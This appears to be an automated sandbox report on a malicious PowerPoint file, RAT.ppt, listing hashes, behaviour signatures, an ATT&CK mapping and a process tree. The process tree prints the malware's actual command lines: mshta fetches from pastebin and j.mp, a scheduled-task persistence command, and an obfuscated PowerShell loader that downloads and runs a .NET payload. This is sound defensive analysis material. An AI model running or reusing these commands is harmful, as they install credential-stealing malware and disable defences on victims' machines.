Analysis

  • max time kernel
    139s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    18-08-2020 09:28

General

  • Target

    RAT.ppt

  • Size

    87KB

  • MD5

    996d8c68ecfe98a2ce25c177927a90e0

  • SHA1

    538d30afcc2d003f95c5f82714134957c8957159

  • SHA256

    20b52843f8e11a925f7008ffe96848e846099130c0c23bd80b3f3c6ee726e234

  • SHA512

    b9f2f992227632b86bcf2aad781738c2be173610bd41359fc581a89c7e4b44cac714385d28f7c967be2a31e8a3c33132aa6d5ced071d41c47aaa1f6c415cff1e

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://pastebin.com/raw/aKjCtLDg

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Lokibot

    Lokibot is a Password and CryptoCoin Wallet Stealer.

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 9 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 42 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\RAT.ppt"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of WriteProcessMemory
    PID:108
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://%909123id%909123id%909123id%909123id%909123id@j.mp\kkkasriiiiii2rkoodd
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Modifies Internet Explorer settings
      • Modifies system certificate store
      • Suspicious use of WriteProcessMemory
      PID:268
      • C:\Windows\System32\mshta.exe
        mshta https://%50%50%50%50%50%50%50%50@pastebin.com\raw\1Kps24Kt
        3⤵
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Modifies Internet Explorer settings
        PID:1964
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 70 /tn "xestuohtiwfyl" /F /tr "\"mshta\"https://%20%20@pastebin.com\raw\1Kps24Kt
        3⤵
        • Creates scheduled task(s)
        PID:1184
      • C:\Windows\System32\mshta.exe
        mshta https://%50%50%50%50%50%50%50%50@pastebin.com\raw\CkLFEYsw
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        PID:2032
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell ((gp HKCU:\Software).Fucku)|IEX
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1492
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/aKjCtLDg'));$_Xpin=$_Xpin.replace('.','*!(@*#(!@#*').replace('*!(@*#(!@#*','0');$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1448
    • \??\c:\windows\system32\cmstp.exe
      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\2emtvo5b.inf
      2⤵
        PID:324

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Scheduled Task

    1
    T1053

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Scheduled Task

    1
    T1053

    Privilege Escalation

    Scheduled Task

    1
    T1053

    Defense Evasion

    Modify Registry

    3
    T1112

    Install Root Certificate

    1
    T1130

    Discovery

    System Information Discovery

    1
    T1082

    Command and Control

    Web Service

    1
    T1102

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
      MD5

      1348df3f0cbba9504d09b65f2a8e2907

      SHA1

      54e8b9aff55e7759267404bc51634a4c41485124

      SHA256

      61e2fd85bd2471bf469f54e1f39aaa031aa9bc379feba3189ab551618736f732

      SHA512

      9868932adba4f793428af27fa03427dd984af6ea54f323ddbd765180ce676139f62a10384381a1764f0837be2860aa987181f5aabe3543870352fea82f935877

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      MD5

      7cabd6a5b31a9c3bc5e1b1b2adbc56c6

      SHA1

      b5c8577d9a3a852585240d89d4f7510b77294268

      SHA256

      fd5191ac63cf4ef151cf5e47ed59c65c04bcce331b373baadfcd105bf8a6fa7c

      SHA512

      82672c167348a7c88c523bf8476827464691c8f35189a343fff9be99a445a6f4dd5274ed1c107efe55b320d42c5304ed75125943551b4a2f37e543815757dc02

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9FF67FB3141440EED32363089565AE60_B50B9FE0B5E2C1038D20CE66215B4AA7
      MD5

      ba71815438afb6b64d29adac08beeaca

      SHA1

      7f3160293346cb8fb62ee66c62a3a8305b63ab08

      SHA256

      62bb1c0e743696751c63d6a80f68360f2b297877b49335b3605853dda73d0fb7

      SHA512

      137c2694980e555876297f76bc73d89b7b4888227e1d8d8e5c0ba909b0dd4e055e105ee988d1dd2af9c3b96f5b4d1d0fa0e540291028a2ec8045502369b70784

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
      MD5

      313658d97704a72c8e972a1cac881606

      SHA1

      597c78d178ed8c5d4122d1638381bec2f9e842aa

      SHA256

      d12a83595628ead073a401854255352d918fe344ad273a0612454bacb7e27aa6

      SHA512

      bd5d1a10f815574cae485316925ccc3d748f6a60ea7f9c2218303fe18d3cdbee9abc23264c3c43603cca48d96f93ba4017b6b030773fc41b5ef6f16e97856f1b

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      MD5

      699d124286bebd9a314aa3d70842b33d

      SHA1

      cf5126a94ed431867dd06b0f8596f17c18ecd593

      SHA256

      91a4de806dc36e48212fd3f481968b6d203817241c3f6163afa0042cfb69606a

      SHA512

      dd8bf53e0b7cc6f9515e3b86f1d0cb23dd7ee8ffd35719cafe496b07fbd9390382ab5c0469ffbbb8ac5282e3c79a6e4910eb0abad95ef905ce8f0c7d357fb89b

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9FF67FB3141440EED32363089565AE60_B50B9FE0B5E2C1038D20CE66215B4AA7
      MD5

      a3357980da81f07518b376c9f117133e

      SHA1

      274a52d16db80c813a796beabcd7b30fa9431a7d

      SHA256

      cc75b461b4ae1e50600e06fd64735567f1142e902ae0fa1efa648ab26c33a8af

      SHA512

      5f049e74a8d8dec559cb2b2c9912e254242edd7b604ef9227f98ae8ca9b7b7a44bb559fc3513305477847007df14b6be028cce3b5359b222c8cccac54782e86a

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
      MD5

      2d62b1f4577e2af8b2119cacfa0d5b0a

      SHA1

      97be5bba7020c2c49c4262252223d7a1f58b6adc

      SHA256

      2f3b2236abdccdddd83b4f8b60a4760ad26bd94a5015be017a21d52bc4b30a69

      SHA512

      c6da4d8b9ac2beae8fa730625dba84b031afdd673616851a49a004def71d3294d4f94a02b07ff0a62c3325eac52cc6a01e7b19549ba177143a300363e7a3029d

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\TG26G5MW.txt
      MD5

      76eb1a30cd4c26d349409d2c5a93e0d4

      SHA1

      e1d3bd863a92aead5f88e96f5fdc62c0387beeda

      SHA256

      b12a357038428e78b21ec2918339dddb6359949845a83c91209544249e8d62b5

      SHA512

      4eb2fd9d8fc5bbc8141fd6c74e8ca30db867932c96a8a5c7063717f94935384a7a40c389d19f6c5cdf811761cc15fd6497031f64634d3ca3c93f548e63e2c211

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
      MD5

      bb1542822f20ac5dc4f41c4d82fe3b6d

      SHA1

      febee277bbe18f8d3eb1a860ad687dff91615674

      SHA256

      0a0722ae403ea83d0f67c1618f1c61544d925eec360a10eb32b1ad7e90bee998

      SHA512

      5daa796bc83e36408ff08d7420dfe9dcc2d1096123a84cf2a5d5a1805586114e7fa0d642de59a2c284d02d13394d3bc938fb71ae5305a861375de12231b291c0

    • C:\Windows\temp\2emtvo5b.inf
      MD5

      8635454e59df4d2b1a64b3812e4a9763

      SHA1

      98e8e9c448b540e6f97f8193e0c632ec55b801e8

      SHA256

      6c0b177e77a24f6504a9116d24c32484b3d0dfc47c301127e356bdbe081a6b78

      SHA512

      f906bb3e52d582e0597abea037f16f8e07772186b8d26a5fc7d64807bff638801c47a48134d8163ba0651a7f9022f4378cef02684e29e1aad6eb278019548a58

    • memory/108-4-0x0000000004850000-0x0000000004854000-memory.dmp
      Filesize

      16KB

    • memory/108-2-0x0000000000730000-0x0000000000731000-memory.dmp
      Filesize

      4KB

    • memory/108-0-0x0000000005850000-0x0000000005950000-memory.dmp
      Filesize

      1024KB

    • memory/268-1-0x0000000000000000-mapping.dmp
    • memory/324-35-0x0000000000000000-mapping.dmp
    • memory/700-5-0x000007FEF2130000-0x000007FEF23AA000-memory.dmp
      Filesize

      2.5MB

    • memory/1184-7-0x0000000000000000-mapping.dmp
    • memory/1448-24-0x000000001AD80000-0x000000001AD81000-memory.dmp
      Filesize

      4KB

    • memory/1448-34-0x0000000002750000-0x0000000002757000-memory.dmp
      Filesize

      28KB

    • memory/1448-17-0x000007FEF52D0000-0x000007FEF5CBC000-memory.dmp
      Filesize

      9.9MB

    • memory/1492-31-0x000000001C4C0000-0x000000001C4C1000-memory.dmp
      Filesize

      4KB

    • memory/1492-41-0x000000001B5A0000-0x000000001B5A1000-memory.dmp
      Filesize

      4KB

    • memory/1492-28-0x0000000001F20000-0x0000000001F21000-memory.dmp
      Filesize

      4KB

    • memory/1492-30-0x000000001C230000-0x000000001C231000-memory.dmp
      Filesize

      4KB

    • memory/1492-22-0x0000000002050000-0x0000000002051000-memory.dmp
      Filesize

      4KB

    • memory/1492-18-0x000007FEF52D0000-0x000007FEF5CBC000-memory.dmp
      Filesize

      9.9MB

    • memory/1492-58-0x000000001C5D0000-0x000000001C5D1000-memory.dmp
      Filesize

      4KB

    • memory/1492-57-0x000000001C5C0000-0x000000001C5C1000-memory.dmp
      Filesize

      4KB

    • memory/1492-45-0x000000001B7D0000-0x000000001B7D1000-memory.dmp
      Filesize

      4KB

    • memory/1492-40-0x000000001C590000-0x000000001C59D000-memory.dmp
      Filesize

      52KB

    • memory/1492-26-0x0000000002710000-0x0000000002711000-memory.dmp
      Filesize

      4KB

    • memory/1492-42-0x000000001B7A0000-0x000000001B7A1000-memory.dmp
      Filesize

      4KB

    • memory/1964-6-0x0000000000000000-mapping.dmp
    • memory/1964-19-0x0000000006920000-0x0000000006943000-memory.dmp
      Filesize

      140KB

    • memory/2032-8-0x0000000000000000-mapping.dmp